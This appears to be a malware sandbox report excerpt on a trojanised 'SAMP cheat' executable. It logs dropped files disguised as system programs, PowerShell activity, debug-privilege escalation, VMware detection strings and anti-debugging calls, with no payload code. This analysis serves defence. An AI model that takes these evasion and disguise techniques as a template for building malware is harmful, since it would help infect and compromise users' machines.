                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\services.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\services.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1880
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1955
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1342
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1419
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1329
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1508
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1565
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1407
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1515
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1523
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1458
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1349
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1412
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1463
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1375
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1185
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1265
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1517
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3471
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDropped PE file which has not been started: C:\Users\user\Desktop\fSPDjruA.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDropped PE file which has not been started: C:\Users\user\Desktop\VrgGeyQY.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDropped PE file which has not been started: C:\Users\user\Desktop\VjwnzPpT.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDropped PE file which has not been started: C:\Users\user\Desktop\MGoyPVal.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDropped PE file which has not been started: C:\Users\user\Desktop\EcfIfcKE.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDropped PE file which has not been started: C:\Users\user\Desktop\vyXTwjuX.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe TID: 4324Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exe TID: 6660Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exe TID: 4636Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep count: 1880 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9080Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8768Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 1955 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8736Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116Thread sleep count: 1342 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9060Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8760Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep count: 1419 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9036Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8720Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep count: 1329 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9064Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8800Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120Thread sleep count: 1508 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1092Thread sleep count: 1565 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9056Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6512Thread sleep count: 1407 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8856Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348Thread sleep count: 1515 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9052Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8784Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684Thread sleep count: 1523 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9072Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8824Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5172Thread sleep count: 1458 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9068Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8776Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8264Thread sleep count: 1349 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9088Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8744Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464Thread sleep count: 1412 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9084Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8836Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8324Thread sleep count: 1463 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9044Thread sleep time: -8301034833169293s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8816Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8384Thread sleep count: 1375 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9092Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8752Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8352Thread sleep count: 1185 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9076Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8848Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8440Thread sleep count: 1265 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9040Thread sleep time: -11068046444225724s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8612Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8348Thread sleep count: 1517 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9048Thread sleep time: -8301034833169293s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8872Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8412Thread sleep count: 3471 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9024Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8864Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe TID: 9016Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe TID: 7012Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\services.exe TID: 9192Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\services.exe TID: 9184Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\services.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\services.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CFA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CFA69B
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D0C220
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D1B348 FindFirstFileExA,0_2_00D1B348
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0E6A3 VirtualQuery,GetSystemInfo,0_2_00D0E6A3
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\services.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\services.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: wscript.exe, 00000002.00000003.1282078732.0000000003627000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: jnowHpJlZlXal.exe.10.drBinary or memory string: EW56lxcP6maaZ8RVmCi8
                                    Source: BridgePortsurrogateserverref.exe, 0000000A.00000002.1691094057.000000001C528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeAPI call chain: ExitProcess graph end nodegraph_0-25126
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D0F838
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D17DEE mov eax, dword ptr fs:[00000030h]0_2_00D17DEE
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D1C030 GetProcessHeap,0_2_00D1C030
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess token adjusted: Debug
